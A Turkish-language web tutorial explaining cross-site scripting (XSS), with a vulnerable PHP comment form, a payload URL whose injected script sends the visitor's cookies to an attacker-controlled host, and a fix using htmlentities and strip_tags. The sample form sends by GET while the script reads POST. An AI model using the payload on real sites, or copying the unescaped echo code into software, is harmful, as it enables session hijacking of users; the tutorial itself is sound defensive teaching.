Xss Nedir?

"XSS açıkları uygulama kullanıcıdan veri alıp, bunları herhangi bir kodlama ya da doğrulama işlemine tabi tutmadan sayfaya göndermesi ile oluşur. XSS saldırganın kurbanın tarayıcısında kullanıcı oturumları bilgilerin çalınmasına, web sitesinin tahrif edilmesine veya solucan yüklenmesine sebep olan betik çalıştırmasına izin verir ."

Hemen bir örnek verelim, burada kullanıcının oturum bilgileri çalınarak benimsunucum.org adresine gönderiliyor.

<form action="yorum.php" method="GET" />
İsim: <input type="text" name="ad" /><br />
Yorum: <textarea name="yorum" rows="10" cols="60"></textarea><br />
<input type="submit" value="Yorumla" /></p>
</form>
yorum.php
<?php
   $ad    = $_POST['ad'];
   $yorum  = $_POST['yorum'];
   echo "<p>$ad nın yorumu <br />";
   echo "<blockquote>$yorum</blockquote></p>";
?>

İşte burada devreye giriyor. Yollanan veriler http://sizinsite.com/yorum.php?ad=osman&yorum=yorum gibi gitmesi gerekirken cin fikirli bir kullanıcı bu adresi şöyle değiştiriyor:

http://sizinsite.com/yorum.php?ad=osman&yorum=<script>document.location='http://benimsunucum.org/kaydet.php?cookies=' + document.cookie </script>

yazarak oturum bilgilerinizi kaydediyor. Verilerin POST ile gönderilmesi buna bir çözüm olabilir diyorsanız yanılıyorsunuz. Zira GET ve POST metotlarının ikiside kolayca manipüle edilebiliyor. Sadece POST ile adres satırında alenen değil  gizli şekilde yapılıyor. Bu web programcılarının yaptığı en büyük zafiyet. Bunun için gelen veriler önce bir değerlendirmeye alınmalı, daha sonra kullanılmaya gönderilmelidir. Şunun gibi güvenli bir kod yapılabilir.

$ad    = htmlentities($_POST['ad'], ENT_QUOTES, 'UTF-8');
$yorum = htmlentities($_POST['yorum'], ENT_QUOTES, 'UTF-8');

strip_tags() ile de bu iş çözülebilir, strip_tags() fonksiyonu değişkendeki bütün html taglarını siler.(Aldığı ek parametre ile bazı etiketlere izin verebilirsiniz.) htmlentities ise değişkendeki html etiketlerini bir htmlentities tablosundaki değerlerle değiştirip değişkeni güvenli hale getirir.

Burada girdileri kontrol ediyoruz ama can sıkıcı bir başka durum ise kontrol edilmeyen veya gözden kaçmış bir alanın yanlışlıkla veritabanına alınması ve kullanıcıya gösterilmesi esnasında yani çıktı kısmına problem oluşturması. Eğer değişkenleri kontrollü alıyorsanız problem yok ama atlanılabilecek bir durum sözkonusu olabilir diye kullanıcıya verilerin sunulması aşamasında da htmlentities ve benzeri html tagl ayıklayıcılarıyla kontrol edilirse çifte güvenlik sağlanmış olur. Mesela kullanıcıya veritabanına bilgi girmeden önce "önizleme" (preview) sunan bir değişken böyle bir soruna yol açabilir.

Tarih:
Hit: 3138
Yazar: WarHead

Taglar: xss nedir?


Yorumlar


Siftahı yapan siz olun
Yorum yapabilmek için üye girişi yapmalısınız.